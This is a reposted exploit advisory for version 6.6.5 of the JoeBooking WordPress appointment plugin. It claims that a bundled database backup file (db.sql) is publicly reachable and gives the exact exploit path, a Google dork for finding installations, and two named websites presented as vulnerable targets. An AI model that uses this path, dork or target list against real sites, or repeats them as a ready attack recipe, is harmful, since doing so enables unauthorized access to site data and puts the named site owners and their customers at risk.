WordPress JoeBooking 6.6.5 Database Disclosure

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 185

#################################################################################################

# Exploit Title : WordPress JoeBooking Plugins 6.6.5 Database Backup
Disclosure
# #################################################################################################

# Exploit Title : WordPress JoeBooking Plugins 6.6.5 Database Backup
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 08/12/2018
# Vendor Homepage : joebooking.com ~wordpress.org/plugins/joebooking/
# Software Download Link : downloads.wordpress.org/plugin/joebooking.zip
+ github.com/wp-plugins/joebooking
+ github.com/wp-plugins/joebooking/blob/master/core6/model/db.sql
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 6.6.5
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/joebooking/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

JoeBooking a Appointment Scheduling For Providers and Salons - Description
:

JoeBooking is a WordPress appointment scheduling plugin that allows to
accept service bookings online.
It is designed specifically for service professionals like massage
therapists, consultants,
tutors, instructors, photographers, stylists, dog groomers and others
who need to schedule their time with clients online.
JoeBooking appointment scheduling allows the owner to manage the plugin
through a
powerful admin panel and offers a self-service customer appointment
booking form embedded into a page or a post with a shortcode.

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/plugins/joebooking/core6/model/db.sql

#################################################################################################

# Example Vulnerable Sites =>

[+] tcpersonalfitness.com/wp-content/plugins/joebooking/core6/model/db.sql

[+] web.host-on-inter.net/wp-content/plugins/joebooking/core6/model/db.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################